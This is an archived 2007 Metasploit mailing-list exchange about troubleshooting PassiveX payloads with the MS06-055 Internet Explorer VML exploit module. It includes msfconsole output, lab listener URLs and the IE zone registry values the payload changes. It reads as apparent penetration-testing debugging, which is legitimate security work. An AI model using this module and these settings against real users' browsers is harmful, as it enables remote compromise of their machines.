Home page logo
/

metasploit logo Metasploit mailing list archives

PassiveX-based payloads and MS06-055
From: mmiller at hick.org (mmiller at hick.org)
Date: Tue, 13 Mar 2007 09:42:32 -0700

On Tue, Mar 13, 2007 at 12:35:27PM +0100, Angelo Dell'Aera wrote:


While doing few tests I noticed a strange behavior while trying
to exploit the VML processing vulnerability in IE referenced by the
Microsoft Bullettin MS06-055 on Windows XP SP1.

... 

I see this behavior...


msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/pentest3
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > 
[*] Sending PassiveX main page to client


and it stops here. I tried using other PassiveX-based payloads with
the same exploit but no luck... always the same result. Other non
PassiveX-based payloads work instead.

I took a look at the registry and everything seems to work fine since 

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3
Values: 1004, 1200, 1201, 1001

are changed to the value 0 as expected.

A few quick things to check:

1) What version of IE is installed on the machine?  I'm assuming IE 6,
but just need to be sure.

2) What happens when you manually bring up the PX site after the values
have been successfully altered?  In the previous example, you could try
browsing to:

http://192.168.33.130:10000//OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s

There might be some additional information you can collect by doing
'setg LogLevel 3' and then taking a look at ~/.msf3/logs/framework.log.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault